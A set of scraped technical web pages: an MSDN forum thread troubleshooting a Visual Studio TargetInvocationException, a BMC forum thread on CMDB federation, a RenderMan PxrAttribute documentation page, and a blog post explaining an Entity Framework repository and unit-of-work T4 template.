I think you might be on to something here with the namespace/assembly renaming. I do remember seeing at least one existing bug in Beta 2 related to errors caused by renamed assemblies and namespaces. I've also experienced unhandled exception pain related to connecting to multiple separate TF server installations with Beta 2 because of a known cache bug (the first one you connect to would get cached, but in a way that would corrupt your ability to access a second distinct TF server installation).
The nastiness of this particular error message is that it doesn't give you much useful troubleshooting information other than the environment context you can remember from before it happened. But I guess I should refrain from digressing into the tester version of Grumpy Old Programmer :) If you do get some time to figure this out and get it isolated, please keep the feedback coming with your repro steps, etc. Your participation really is making a difference; links to these forum posts are added right there in the work item tracking system, so it is a nice communications channel for us.
--- Eric Jarvi, June 07, 2005 3:24 PM

Hi, if you are successfully creating and working with TV in a fresh project/solution, it sounds like something in the project or solution is broken. What we have experienced is this error when the solution file CPU-flavour references become corrupted (mostly from moving Solution files from old versions of whidbey).

1: Open the .sln file in notepad
2: Change all references to "AnyCPU" (note the missing space) to "Any CPU"
3: Save
4: Open the solution again

Yours, Dominic
Tuesday, June 07, 2005 5:17 PM

Unfortunately I had my harddisk crash on Friday, and the project(s) where I experienced the error were lost (at least temporarily until I know whether the disk can be rescued). I'll keep my eyes open, and report here if I can reproduce the problem. Thanks for all feedback,
Tor.
Tuesday, June 07, 2005 5:36 PM

I'm currently experiencing this problem. I have not yet found the source of the problem or a work-around, but, in my case, the problem is related to a deployment project that was added as the ninth project in a solution which contains a web site and several other projects for the application.
If I remove the deployment project from the solution, the Manage and Execute Tests interface will appear and the list of tests will populate, but, when I add it back in, I either receive the error the original poster reported, or no error and an empty test list. If I find the source of the problem, I will report back here.
Wednesday, June 08, 2005 12:19 AM

I've been having the exact same problem. For me, the problem started when I added a Web Deployment Project into my solution. The solution has:

- Data Class libraries (in their own project)
- Business Class libraries (in their own project)
- Web Site
- Unit Test project
- Web Deployment project

When I go to the "Manage and Execute Tests" menu item, I get "Exception has been thrown by the target of an invocation." Using SourceSafe to check "what changed" between the version that worked, and the one that didn't, the answer turned out to be the Web Deployment project. I can:

1 - Launch VS.NET 2005 Beta 2
2 - Click on "Manage and Execute Tests" and get the exception
3 - Remove the Deployment project from the solution
4 - Click on "Manage and Execute Tests" and have it work.

(No restarting of VS.NET 2005 needed in the above 4 steps). I did try reproducing this in a new solution, but was unable to get a similar failure.
-- Chris Mullins
Wednesday, June 08, 2005 8:59 PM

If a "Web Setup Project" Deployment project exists within your solution, the "Manage and Execute Tests" feature will not work properly. I will submit a bug report after posting this message. Here are the steps to reproduce the problem:

1. Start Visual Studio 2005 Beta 2.
2. Create a new Visual Basic Windows Application Project, allowing Visual Studio to create a solution for the project at creation time. It is not necessary to add the project or solution to source control.
3. Close the default form opened after the project has been created.
4. Add a new "Test Project" project to the solution (in the Add New Project Window, select "Test Projects", then "Test Documents", then "Test Project".)
5. Close the two default test project windows.
6. Do a "Save All".
7. Close the solution.
8. Open the solution.
9. Select "Manage and Execute Tests" from the Test menu.
10. In the Test Manager window, observe the three default test list options in the upper-left pane ("Lists of Tests", "Tests Not in a List" and "All Loaded Tests").
11. In the Test Manager window, click "Tests Not in a List" and observe the presence of the two default entries in the main content pane of the Test Manager window, "manualtest1" and "TestMethod1".
12. In the Test Manager window, click "All Loaded Tests" and observe the presence of the two default entries in the main content pane of the Test Manager window, "manualtest1" and "TestMethod1".
13. Close the Test Manager window.
14. Add a new "Web Setup Project" project to the solution (in the Add New Project Window, select "Other Project Types", then "Setup and Deployment", then "Web Setup Project".)
15. Close the default "File System (ProjectName)" window.
16. Do a "Save All".
17. Close the solution.
18. Open the solution.
19. Select "Manage and Execute Tests" from the Test menu.
20. You will either receive the "Exception has been thrown by the target of an invocation" error, or you will see the Test Manager window.
21. If you see the Test Manager window, continue with the following steps.
22. In the Test Manager window, note the absence of the three default test list options ("Lists of Tests", "Tests Not in a List" and "All Loaded Tests") in the upper-left pane of the Test Manager window.
23. In the Test Manager window, note the absence of the two previously visible default tests, "manualtest1" and "TestMethod1".
24. Do a "Save All".
25. Close the solution.
26. Open the solution.
27. Remove the "Web Setup Project" Deployment Project from the solution.
28. Do a "Save All".
29. Close the solution.
30. Open the solution.
31. Select "Manage and Execute Tests" from the Test menu.
32. In the Test Manager window, observe the three default test list options in the upper-left pane ("Lists of Tests", "Tests Not in a List" and "All Loaded Tests").
33. In the Test Manager window, click "Tests Not in a List" and observe the presence of the two default entries in the main content pane of the Test Manager window, "manualtest1" and "TestMethod1".
34. In the Test Manager window, click "All Loaded Tests" and observe the presence of the two default entries in the main content pane of the Test Manager window, "manualtest1" and "TestMethod1".
Thursday, June 09, 2005 7:00 PM

I've reported this as a bug, and it is currently being reviewed. The bug ID is FDBK29360. Bug URL:
June 09, 2005 7:39 PM

Thank you very much for reporting the bug. I have checked that this bug has already been fixed for the RTM version of the product. The only known workaround is to remove the setup project from the solution. Sorry for the inconvenience caused. Thanks!
Winnie
Thursday, June 09, 2005 8:27 PM

I had a similar problem with a Sql Server Integration Services Project in my solution.. by unloading the solution, i could again Manage and View the Tests. I had also deleted the .vsmdi and .testrunconfig files from the solution... although i'm not sure if it was needed, so vs.net would generate new ones (I had to delete them via explorer, as vs.net wouldn't let me)
Wednesday, June 15, 2005 4:09 AM

ok, well. it seems that all i needed to do is leave it alone for 30 minutes and it worked. No joke. I think my computer is evoluting. =D Maybe it will make my code for me!! =)
Tuesday, June 28, 2005 5:08 PM

yes, deleting the .vsmdi and testrunconfig doesn't do anything.. i encountered the error once again when i added a Deployment project (.msi). it seems that the error in vs.net is related to the test manager/system trying to parse/read/analyse certain types of Projects.
when i removed the deployment project from the solution, it all worked again
Friday, July 01, 2005 5:25 AM

for what it's worth, here's my 2 cents: i had this same error a bit after i added a setup project to my solution. i didn't fix it by removing it; instead i found out that the problem was something else: before i got the error, i propertied the setup project release folder to be shared to my home network so i could install it on the other pc. seems that un-sharing this folder fixed the error. thanks for all the ones who replied to this post; somewhere in page 1 i remember i got the idea of unsharing from one of the posts which i can't remember right now. enjoy
Monday, April 17, 2006 11:17 PM

Hi All,

In my UI Layer I am raising the exception Divisible by Zero. In the Catch block of the UI Layer I am calling the Business layer function to write this exception into the Event Viewer. After the exception is written into the Event Viewer, the control comes back to the Catch block of the UI Layer. That is when I get the error "Exception has been thrown by the target of an invocation." If you know the solution for this problem, please reply to this mail. I am using .Net 2.0, Application Block 2.0 and XP Professional.

See the following code:

Business Layer

    public interface ICommonFunctions
    {
        void LogErrInToFile(Exception ex);
    }

    public class CommonFunctions : MarshalByRefObject, ICommonFunctions
    {
        public bool LogErrInToFile(Exception ex)
        {
            bool boolError = ExceptionPolicy.HandleException(ex, "ExceptionPolicy");
        }
    }

UI Layer

    try
    {
        int i = 1;
        int j = 0;
        int k = i / j;
    }
    catch (Exception ex)
    {
        bool boolError = objCF.LogErrInToFile(ex);
        //Error occurs after the control comes from Business layer.
    }
    finally
    {
    }

Error

System.Reflection.TargetInvocationException was unhandled
Message="Exception has been thrown by the target of an invocation."
Source="mscorlib"
StackTrace:
Server stack trace:
  .Soap.ObjectReader.Deserialize(HeaderHandler handler, ISerParser serParser)
  at System.Runtime.Serialization.Formatters.Soap.SoapFormatter.Deserialize(Stream serializationStream, HeaderHandler handler)
  at System.Runtime.Remoting.Channels.CoreChannel.DeserializeSoapResponseMessage(Stream inputStream, IMessage requestMsg, Header[] h, Boolean bStrictBinding)
  at System.Runtime.Remoting.Channels.SoapClientFormatterSink.DeserializeMessage(IMethodCallMessage mcm, ITransportHeaders headers, Stream stream)
  Thames.OSS.Interfaces.ICommonFunctions.LogErrInToFile(Exception ex)
  at OSSThickClientProject.ProfileManagement.profileManagement_Load(Object sender, EventArgs e) in D:\GISADS3\OSSThickClientProject\ProfileManagement.cs:line 63
  .SendMessage(HandleRef hWnd, Int32 msg, Int32 wParam, Int32 lParam)
  OSSThickClientProject.Program.Main() in D:\GISADS3\OSSThickClientProject()

Thanks in advance.
Regards,
Rajaram.
Friday, July 14, 2006 5:05 AM

Thnx buddy, I was facing the same problem while invocation of objects by using reflection and i found the correct solution.
Monday, July 09, 2007 9:32 AM

Hi guys, i'm having the same problem when adding an access db connection in server explorer. any ideas on this? thanks, dave
Friday, September 14, 2007 1:38 AM

Hi, I got the same error "Exception has been thrown by the target of an invocation" when I run my solution under Windows 2000, but when I run this solution on a PC running Windows XP it works fine. Actually my VB6 COM object has three parameters and one of them is Long; somehow it doesn't work in Windows 2000. After spending time on it, I passed all three parameters as String and it worked. Here is my code that now works on both 2000 and XP.
The Windows 2000 machine has only .Net Framework 1.1; the XP machine has .Net Framework 1.1 and 2.0, but I built this solution in .Net 1.1.

Dim lStatus As Long
Dim lTaskKey As Long
Dim objParam As Object
ReDim objParam(2)

lTaskKey = 15694
objParam(0) = lTaskKey.ToString() ' When I pass lTaskKey as Long it gives an error on Windows 2000
objParam(1) = "XYZ"
objParam(2) = "Server2"

' Late binding way
Dim objType As Type
Dim objObject As Object
objType = Type.GetTypeFromProgID("HR.Task") ' HR.Task is a VB6 COM object
objObject = Activator.CreateInstance(objType)
lStatus = objType.InvokeMember("GetStatus", System.Reflection.BindingFlags.InvokeMethod, System.Type.DefaultBinder, objObject, objParam)

I hope this will help someone. Thx
Saturday, October 20, 2007 5:39 AM

I'm having the same problem. I'm using VB in VS 2005. The code is:

'This event is fired on the background thread
mobjQueueReader = New STARWorkFileListener.cWrkFleListener
AddHandler mobjQueueReader.UpdateThreads, AddressOf Me.UpdateTextBox
mobjQueueReader.StartListening(sCN)

It compiles with no problem but errs on the AddHandler. The full message is:

System.Reflection.TargetInvocationException was unhandled by user code
Message="Exception has been thrown by the target of an invocation."
Source="mscorlib"
StackTrace:
   .EnterpriseServices.ComponentSerializer.UnmarshalFromBuffer(Byte[] b, Object tp)
   at System.EnterpriseServices.ComponentServices.ConvertToMessage(String s, Object tp)
   at System.EnterpriseServices.ServicedComponent.RemoteDispatchHelper(String s, Boolean& failed)
   at System.EnterpriseServices.ServicedComponent.System.EnterpriseServices.IRemoteDispatch.RemoteDispatchNotAutoDone(String s)
   at System.EnterpriseServices.IRemoteDispatch.RemoteDispatchNotAutoDone(String s)
   at System.EnterpriseServices.RemoteServicedComponentProxy.Invoke(IMessage reqMsg)
   at System.Runtime.Remoting.Proxies.RealProxy.PrivateInvoke(MessageData& msgData, Int32 type)
   at System.Object.FieldSetter(String typeName, String fieldName, Object val)
   at STARWorkFileListener.frmWrkFileListener.Worker_DoWork(Object sender, DoWorkEventArgs e) in C:\Galaxy\Services\File Listener\STARWorkFileListener\frmWrkFileListener.vb:line 359
   at System.ComponentModel.BackgroundWorker.OnDoWork(DoWorkEventArgs e)
   at System.ComponentModel.BackgroundWorker.WorkerThreadStart(Object argument)

Any ideas what I may have missed? Thanks
Tuesday, December 18, 2007 6:36 PM

I am using VS2008 SP1 on x86 Vista. If you have any help for this problem, please email reprisethelung@live.com or just post on this discussion. Thank you very much for any time anybody puts into it.

I have been having the same problem, but only after I did the following:

1. Installed VS2008 SP1 (.NET 3.5)
2. Installed the Silverlight 2.0 SDK
3. Then I created a VB .sln (for Silverlight) and played around with a Silverlight 2.0 project in VB/xaml/html/javascript/aspx, and everything was working great.
4. Then I tried to create a new .sln for a new C# Silverlight project, but got a message saying "C# compiler could not be created", and was not able to create any C# .sln, including a C# Console Application.
5.
Upon encountering that problem, I did some searching and discovered "devenv.exe". After running that, I used "devenv.exe /ResetSkipPkgs", and then I was able to create all the types of C# .sln's.
6. I only get the message (posted below) in the design view while developing Silverlight apps in either C# or VB. However, by clicking 'Click here to reload designer' once or twice, it usually goes away.

The only reason I post this is because the messages are scary, and it bugs me that something horribly wrong could be going on with Visual Studio. The software cost so much, and I care about the health of it. I realize I am at fault for not researching "devenv.exe /ResetSkipPkgs" before entering it, or for not trying to find all solutions to my compiler problem.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - -
THE MESSAGE THAT POPS UP IN DESIGN VIEW
- - - - - - - - - - - - - - - - - - - - - - - - - - - - -

An unhandled exception has occurred. Details:

   MS.Internal.Package.MetadataLoader.InitializeProfileMetadata(RegistryKey registryRoot, String profile, LogCallback logger)
   at MS.Internal.Designer.VSIsolatedDesigner.VSIsolatedDesignerFactory.CreateDesigner(DesignerContext context)
   at MS.Internal.Host.Isolation.IsolatedDesigner.BootstrapProxy.CreateDesigner(IsolatedDesignerFactory factory, IDesignerContextProtocol contextProtocol)
   at MS.Internal.Host.Isolation.IsolatedDesigner.BootstrapProxy.CreateDesigner(IsolatedDesignerFactory factory, IDesignerContextProtocol contextProtocol)
   at MS.Internal.Host.Isolation.IsolatedDesigner.Load()
   at MS.Internal.Designer.DesignerPane.LoadDesignerView()

Could not load type 'System.Windows.Controls.WebBrowser' from assembly 'PresentationFramework, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35'.
   at Microsoft.Windows.Design.Metadata.DeveloperMetadata.DeveloperMetadataBuilder.AddWebBrowserAttributes()
   at Microsoft.Windows.Design.Metadata.DeveloperMetadata.DeveloperMetadataBuilder..ctor()
   at Microsoft.Windows.Design.Metadata.DeveloperMetadata.get_CustomAttributes()
   at Microsoft.Windows.Design.Metadata.DeveloperMetadata.Initialize()

Tuesday, October 21, 2008 10:03 AM - Edited by doyle.ellsworth Tuesday, October 21, 2008 10:10 AM

- I have the same issue on a message box invocation:

if (MessageBox.Show("Start simulation ?", "Title", MessageBoxButtons.YesNo, MessageBoxIcon.Question) == DialogResult.Yes)
{
    backgroundWorker1.RunWorkerAsync();
}
else
{
    return;
}

Removing this invocation fixes the problem for me.
Tuesday, February 24, 2009 2:02 PM

- I ran into this problem in a Windows app solution; one of my custom components read from a DB in the constructor after initialization. The solution didn't like that, so I created a public method and called that from the parent form after it loaded. Just another solution to add to the bunch.
Wednesday, April 08, 2009 6:00
Friday, June 05, 2009 8:43 AM

- Proposed as answer by BirukSolomon Wednesday, October 28, 2009 7:46

This worked brilliantly, thank you. At the time, I was writing new unit tests in a fresh solution while TFS was down; this did the trick.
Thursday, June 18, 2009 8:06 PM

- From the application side, I was installing an ASP application that I know works properly in other environments, but I was getting the same error. The fix ended up being a repair of .NET Framework 3.5.
Wednesday, August 19, 2009 7:36

Great, thank you.
Thursday, January 28, 2010 10:33 AM

It's a "Five Step Program" that really works! Brilliant solution! Looking forward to a fix because that error message is pretty cryptic.
Thursday, May 06, 2010 8:28 PM

In case you are using TFS (Team Foundation Server): for some reason your solution went offline, and when you make it go online again it will fix the issue.
1) Open your solution
2) Right-click the solution and click "Go Online"
3) Re-run the test. By now the error message should have gone away.
Saturday, July 17, 2010 1:05 AM

I have the same problem on VS2008 SP1. After disconnecting/reconnecting the solution from TFS, all works correctly.
Saturday, August 21, 2010 5:52 PM

- The solution to this problem comes from a Microsoft bug. To use the unit testing tool for Visual Studio 2008, you will need a support request for the hotfix; this fix is unfortunately protected by the terms of use. Here is the link to request it; the software is VS90SP1-KB980216-x86.exe.
Monday, October 18, 2010 3:44 PM

If you have an .edmx file in your project then please change its properties:
1. Right-click the .edmx file and select Properties.
2. Change Build Action to "Entity Deploy".
Press F5 to see whether it's fixed. Thanks
Wednesday, September 21, 2011 7:01 AM

- Hi, have you solved the problem? Can you tell me how? I'm so freaked out by it now.
Tuesday, November 15, 2011 3:04 AM

rajaram, have you ever found the solution to your error? I have the same problem!!!! fffz
Thursday, February 02, 2012 11:24 PM

@sanket ... Test -> Windows -> Test Results still gives "Exception has been thrown by the target of an invocation" :(
Monday, February 13, 2012 1:23 PM

Has anyone found a solution to this problem? I have the same issue. When I try to save the webtest I get the exception "Exception thrown by the target of invocation". The regular website works properly; I'm facing the issue with the webtest only. I'm using Windows Vista - VS2010 Premium.
Thursday, March 15, 2012 6:24 AM - Edited by shreyamalani Thursday, March 15, 2012 6:24 AM

Hi shreyamalani, can you please check the following checkpoints in your application:
1) Check for TFS connectivity. You may not have access to TFS projects, or TFS is not connected.
2) Check if you are inheriting any class without the service namespace.
3) Check whether you are trying to refer to a method without instantiating it.
Monday, September 17, 2012 8:23 AM
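One point the thread never states outright: TargetInvocationException is only a wrapper, and the original error normally survives in its InnerException property, which is usually the thing worth logging. A hedged sketch (the Demo class and Divide method are invented for illustration):

```csharp
using System;
using System.Reflection;

class Demo
{
    static int Divide(int a, int b) { return a / b; }

    static void Main()
    {
        try
        {
            // Invoking via reflection wraps any failure in a
            // TargetInvocationException, much like the posts above describe.
            typeof(Demo).InvokeMember("Divide",
                BindingFlags.InvokeMethod | BindingFlags.Static | BindingFlags.NonPublic,
                null, null, new object[] { 1, 0 });
        }
        catch (TargetInvocationException tie)
        {
            // The original error survives in InnerException; log that,
            // not the generic wrapper message.
            Exception real = tie.InnerException ?? tie;
            Console.WriteLine(real.GetType().FullName + ": " + real.Message);
        }
    }
}
```

Here the unwrapped exception is a DivideByZeroException, which is far more useful in a log than "Exception has been thrown by the target of an invocation."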
http://social.msdn.microsoft.com/Forums/en-US/8bd8da75-76d2-4257-aeee-d040e6167bf9/exception-has-been-thrown-by-the-target-of-an-invocation?forum=vstsprofiler
Communities

CMDB Federation Retrieval Method - To view federated data
Deepak S  May 2, 2018 1:26 AM

Hi Friends,

Need your help on the retrieval method of CMDB federation. I have followed the BMC documentation and created the federation as below:
- Created a Repository plugin on the JDBC adapter to connect to an Oracle DB. It is successful and the plugin is loaded.
- Using the Retrieval Definitions, I created a federated data class as shown below.
- Created a Federated Relationship class as below.

Now I don't know where I can see the federated data. I launched the Atrium Explorer, but could see only the CI and its relationships. Not sure where I can visualize the federated data. I did not find any documentation on this one, also nothing in YouTube videos, and hardly anything in the community.

Thanks,
Deepak

1. Re: CMDB Federation Retrieval Method - To view federated data
Jeremy Ashe  May 3, 2018 2:57 PM (in response to Deepak S)
1 of 1 people found this helpful

I'm having the same issue. This is what I've tried so far, based on this comment from the Atrium documentation:

"Federated data is information about a configuration item (CI) that is stored outside BMC Atrium CMDB and is linked to CIs in BMC Atrium Configuration Management Database (BMC Atrium CMDB). BMC Atrium Explorer allows you to retrieve federated instances that are related to a core CI in the BMC Atrium CMDB."

And also here, instructions to view federated data related to a CI (it sounds like this is what you are doing above): Viewing federated data in BMC Atrium Explorer - Documentation for BMC Atrium Core 9.1 - BMC Documentation

I've created the federated data class (assets in a legacy Remedy database) and a federated relationship class to the BMC_Person CI class using the username, which is stored on both records. I found a person record that I know has a match in the legacy assets and dropped it into the Atrium Explorer, but there are no child IDs found for me.
I'm wondering if the federated data, which has a distinct namespace (BMC.Fed), is maybe also stored in a different dataset.

2. Re: CMDB Federation Retrieval Method - To view federated data
Deepak S  May 4, 2018 12:03 AM (in response to Jeremy Ashe)

Thanks Jeremy for the update. Looks like there was some issue in Atrium Explorer; however, I can see the data in the federated data class forms that were created.

3. Re: CMDB Federation Retrieval Method - To view federated data
Carey Walker  May 6, 2018 2:54 AM (in response to Deepak S)

Hi Deepak and Jeremy,

I had pretty much the same issue about a year back. It required a hot fix from BMC to resolve. This fix was supposed to be included in 9.1.03 and above, so if you are already at that version or above, it won't be the same issue.

So I had done all the setup required correctly. I could see the federated class form, and if I searched that form, it correctly populated the data from the federation source (in my case it was simply a test table we created in the ARSYSTEM DB). This proved that all the ODBC/JDBC config was correct and that the relationship from the federated class (the key attributes etc.) was working. Except that in Atrium Explorer, when you double-clicked (or selected Expand Both) on the CI class that was supposed to have the related federation class, nothing happened!

The original ticket number with support was 00103194.

If you have a test area where you can be a bit reckless, please try the following. Find the CI you are federating FROM. I'll assume it's in BMC.ASSET and has been reconciled, so it has a valid reconciliation id (i.e. it is not 0). Set the recon id back to 0 (after saving its value somewhere). Save the CI. Now go back to Atrium Explorer and try the double-click or Expand Both on the CI again. If you have the same issue, voila, you will see the federated class related to the core CI and you will be able to use the functionality as expected (i.e. drill in to see attributes etc.).

Please let us know how this goes.

4.
Re: CMDB Federation Retrieval Method - To view federated data
Deepak S  May 7, 2018 5:40 AM (in response to Carey Walker)
1 of 1 people found this helpful

Thanks Carey. I guess I have already tried making the recon Id = 0 and checked, but I was still not able to visualize the federated data in Atrium Explorer.

Thanks,
Deepak
https://communities.bmc.com/thread/178764
PxrAttribute allows the user to read attributes attached to (stored on) a node. An example would be adding a color attribute to a set of objects to be read by a material later. In this way, a material can change its result based on the object being rendered, instead of requiring a different material. Below, color attributes are attached to the spheres of the shader ball. A single PxrSurface material renders with a different diffuse color as specified by each shape's defined attribute. Examples of usage are below.

There may be a performance penalty for using this node in many places in your scene. Efficiency is key, to avoid too many evaluations of user attributes when not necessary.

Input Parameters

Variable name
This field takes a string that identifies the attribute. The string should include the namespace for the attribute and the attribute name, separated by a colon. For example, trace:maxdiffusedepth or user:Ball.

Variable Type
This specifies the type of variable to read and must match what was specified above on the other nodes.
- Integer
- Float
- Float 2
- Color
- Point
- Vector
- Normal

Output Parameters

resultF
A float result.

resultRGB
The color result.

Example Usage

DCC applications may use a different mechanism for applying a user attribute. Below are examples of applying a color user attribute named "Ball" to a shape.

Maya: Add a Pre Shape MEL attribute to the shape using the Attributes > RenderMan menu:

RiAttribute "user" "color Ball" 1 0.2 0.65

Katana: Below is an OpScript example of the same attribute in Katana:

gb = GroupBuilder()
gb:set("value", FloatAttribute({1.0, 0.2, 0.65}, 3))
gb:set("type", StringAttribute("color"))
Interface.SetAttr("prmanStatements.attributes.user.Ball", gb:build())

Houdini: See Using PxrMatteID as an example of how to add a user attribute in Houdini.
https://rmanwiki.pixar.com/display/REN/PxrAttribute?reload=true
Programmer, Geek, ASPInsider
A blog about code and data access

I have posted a project on CodePlex. It is a T4 template to give you a data layer that follows the Repository and Unit of Work patterns and is also ready for Dependency Injection (DI). DI frameworks allow you to build code that is more testable and allow for a greater separation of concerns (SoC). This is not the only use for them, but it is a big one and what they are commonly popular for. You don't have to use DI to get a good separation of concerns, but it certainly can help. It is one of the most important things that developers can do to make their code more maintainable, but it is unfortunately one of the things that is commonly overlooked.

Most applications these days work with data at some point, and a large number of them use relational databases. Many developers use Object Relational Mapping (ORM) tools to make that process easier. Entity Framework is Microsoft's ORM and data access strategy moving forward. LINQ to SQL also exists, but Entity Framework is where the new innovation will happen. As such, it is easy to use the ORM tool as your data access layer and not just a data access technology. While this works, it doesn't lend itself to an application with a good separation of concerns.

When I build an application, I normally try to separate the code out by assemblies into logical pieces. If you don't separate by assemblies, at the very least separate by namespaces. This will give you the ability to separate by assemblies later if you need to. One common thing I like to separate is the data access layer. There are several reasons for this, but one of the biggest is simply code reuse. I rarely write an application that doesn't have multiple pieces that need to access data, so having it separated reduces duplication and thus lends itself to a more maintainable and sustainable application.

So what does this have to do with my T4 template project on CodePlex?
This template will generate the files necessary to give you a persistence-ignorant, testable data layer without having to write a great deal of code. I am a huge fan of code generation where it makes sense, and this is one area where I think it does. I also feel that you should know what code generation is doing; this makes debugging much easier. I am going to focus in this post on what files are generated and how to use what is there to build your data layer. I will have additional samples available in the future with different DI frameworks and more advanced samples.

The template looks for an .edmx file in the same directory with it and will generate several files based on your model. Most of these files will be re-generated when the T4 template is executed, but there are a few that will not. These will allow you to put custom logic in those files without having to create your own partial classes.

IRepository.cs
IUnitOfWork.cs
EFRepository.cs
EFUnitOfWork.cs
RepositoryIQueryableExtensions.cs
{EntityName}Repository.cs
{EntityName}Repository.Generated.cs

IRepository.cs: Interface for the Repository portion. This is one of two interfaces that are generated. It is structured so that when mocking for testing, you only need to mock the two interfaces and everything will fall into place properly.

public interface IRepository<T>
{
    IUnitOfWork UnitOfWork { get; set; }
    IQueryable<T> All();
    IQueryable<T> Find(Func<T, bool> expression);
    void Add(T entity);
    void Delete(T entity);
    void Save();
}

You can see there is a property for an IUnitOfWork which will hold the actual context. Basic CRUD functions are exposed here as well. This will likely be expanded as the project grows and matures. Feel free to give me feedback on anything you would like to see added here.
IUnitOfWork.cs: Interface for the Unit of Work.

public interface IUnitOfWork
{
    ObjectContext Context { get; set; }
    void Save();
    bool LazyLoadingEnabled { get; set; }
    bool ProxyCreationEnabled { get; set; }
    string ConnectionString { get; set; }
}

The ObjectContext in the unit of work is the only dependency on Entity Framework in the project and is set to the real concrete ObjectContext in the EFUnitOfWork. The other properties are used to set properties on the object context without having to directly access the context itself. Since this interface is the gateway into the Entity Framework, this is the one that you will want to mock when building tests.

EFRepository.cs: Concrete class for actually working with Entity Framework classes.

public class EFRepository<T> : IRepository<T> where T : class
{
    public IUnitOfWork UnitOfWork { get; set; }

    private IObjectSet<T> _objectset;
    private IObjectSet<T> ObjectSet
    {
        get
        {
            if (_objectset == null)
            {
                _objectset = UnitOfWork.Context.CreateObjectSet<T>();
            }
            return _objectset;
        }
    }

    public virtual IQueryable<T> All()
    {
        return ObjectSet.AsQueryable();
    }

    public IQueryable<T> Find(Func<T, bool> expression)
    {
        return ObjectSet.Where(expression).AsQueryable();
    }

    public void Add(T entity)
    {
        ObjectSet.AddObject(entity);
    }

    public void Delete(T entity)
    {
        ObjectSet.DeleteObject(entity);
    }

    public void Save()
    {
        UnitOfWork.Save();
    }
}

There is a lot going on here, but the key thing to note in this file is the IObjectSet<T>. This is how the ObjectContext contained inside the unit of work knows which classes to work with. This class is the basis for all of our actual data layer classes, as you will see shortly. Using a combination of the methods exposed here, you should be able to do anything you need to do to query and work with entities.
EFUnitOfWork.cs: Mostly properties that interface with the context.

public partial class EFUnitOfWork : IUnitOfWork
{
    public ObjectContext Context { get; set; }

    public EFUnitOfWork()
    {
        Context = new DataModelContainer();
    }

    public void Save()
    {
        Context.SaveChanges();
    }

    ...
}

In the constructor the actual concrete ObjectContext is set. This is added directly by the T4 template and is extracted directly from the .edmx file. The ObjectContext is exposed as a public property so you can access it directly if need be.

There are two more classes that get generated for each entity. They are {Entity}Repository.cs and {Entity}Repository.generated.cs. The {Entity}Repository.generated.cs file contains the code that interfaces with the IRepository<T> and IUnitOfWork. The {Entity}Repository.cs classes are where you will put your own custom data layer logic. This is where this template will really help. If we have a Person entity, we will have PersonRepository.cs and PersonRepository.generated.cs.

PersonRepository.generated.cs: The glue that makes it all work.

public partial class PersonRepository
{
    private IRepository<Person> _repository { get; set; }
    public IRepository<Person> Repository
    {
        get { return _repository; }
        set { _repository = value; }
    }

    public PersonRepository(IRepository<Person> repository, IUnitOfWork unitOfWork)
    {
        Repository = repository;
        Repository.UnitOfWork = unitOfWork;
    }

    public IQueryable<Person> All()
    {
        return Repository.All();
    }

    public void Add(Person entity)
    {
        Repository.Add(entity);
    }

    public void Delete(Person entity)
    {
        Repository.Delete(entity);
    }

    public void Save()
    {
        Repository.Save();
    }
}

The first thing you will likely notice is that the class doesn't inherit from anything. This is by design, as I would still have to implement all of the methods if I inherited directly from IRepository<Person>.
I have some plans to make a base class that will reduce the total amount of code; I'm just not finished with it yet. Be looking for that in the coming weeks.

The PersonRepository class now has access to all of the basic methods from IRepository<T> because they are re-implemented here. The Repository property is what gives you access to this. We have here basic CRUD operations: Add (Create), Find (Read), Save (Update) and Delete (Delete). All are very self-explanatory, with maybe the exception of Find. The Find method takes a lambda expression just like the Where clause of an IQueryable. In fact, it passes it directly to the Where clause of an IQueryable.

While the methods in this class are great, they are not really meant to be used directly, but rather through data access methods. You certainly can use them directly, but I would recommend another approach. The PersonRepository.cs file won't get overwritten when the template runs, so that is where you would put your logic. Let's start by creating a method to find a person by their primary key. We will simply call it GetPerson(int personId). We will then call Repository.Find() and query for the personId:

public Person GetPerson(int personId)
{
    return Repository.Find(p => p.PersonId == personId).FirstOrDefault();
}

We use the Repository property that is in the generated file to gain access to the Entity Framework. We are doing a basic query here to find the person based on their associated personId. We are calling FirstOrDefault() to return the first entity that is in the result set. If there are none, it will return null. We could just use First(), but it would throw an exception, and I would rather do a null check personally.

Now that we have a method to use, let's use it.
The first thing you need to do is create a PersonRepository instance so you can access the newly created method. The PersonRepository constructor takes in a couple of parameters:

public PersonRepository(IRepository<Person> repository, IUnitOfWork unitOfWork)

It looks for an IRepository<Person> and an IUnitOfWork. These can be satisfied by using an EFRepository<Person> and an EFUnitOfWork. To create our instance we will use the following:

var personRepository = new PersonRepository(new EFRepository<Person>(), new EFUnitOfWork());

We can now execute our method:

int personId = 1;
var person = personRepository.GetPerson(personId);

If person comes back null, then we know it wasn't found. Otherwise, we have our entity to start working with. It's as easy as that.

Now, if you notice, I created a new EFUnitOfWork. This is fine if you are only using one repository class. If you need to actively use more than one, you will need to create a shared unit of work and pass it in. Say we also have an AddressRepository; it would look like this:

var unitOfWork = new EFUnitOfWork();
var personRepository = new PersonRepository(new EFRepository<Person>(), unitOfWork);
var addressRepository = new AddressRepository(new EFRepository<Address>(), unitOfWork);

// Do some stuff requiring saving

unitOfWork.Save();

Here is where the unit of work pattern comes into play. You can perform multiple actions on the unit of work within multiple repositories and then call Save once. The Save() call in turn calls the SaveChanges() method on the ObjectContext, which will by default wrap the entire unit of work in a transaction. If anything fails, the whole operation is rolled back.

Now these methods aren't as easily testable as they could be. In the next post we will look at how it works with Dependency Injection, and specifically StructureMap.
StructureMap makes the methods more testable and at the same time makes the whole process easier, without adding unnecessary complexity.

Go to efrepository.codeplex.com to download!
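Since the template is structured so that mocking just IRepository<T> and IUnitOfWork makes everything fall into place, a hand-rolled in-memory fake is one way to test data access methods like GetPerson without a database. This is only an illustrative sketch; the FakeRepository name and details are mine, not part of the template's generated output:

```csharp
using System;
using System.Collections.Generic;
using System.Linq;

// Illustrative in-memory fake of IRepository<T>; no database or
// ObjectContext is needed, so tests stay fast and isolated.
public class FakeRepository<T> : IRepository<T> where T : class
{
    private readonly List<T> _items = new List<T>();

    public IUnitOfWork UnitOfWork { get; set; }

    public IQueryable<T> All() { return _items.AsQueryable(); }

    public IQueryable<T> Find(Func<T, bool> expression)
    {
        return _items.Where(expression).AsQueryable();
    }

    public void Add(T entity) { _items.Add(entity); }
    public void Delete(T entity) { _items.Remove(entity); }
    public void Save() { /* nothing to persist in memory */ }
}
```

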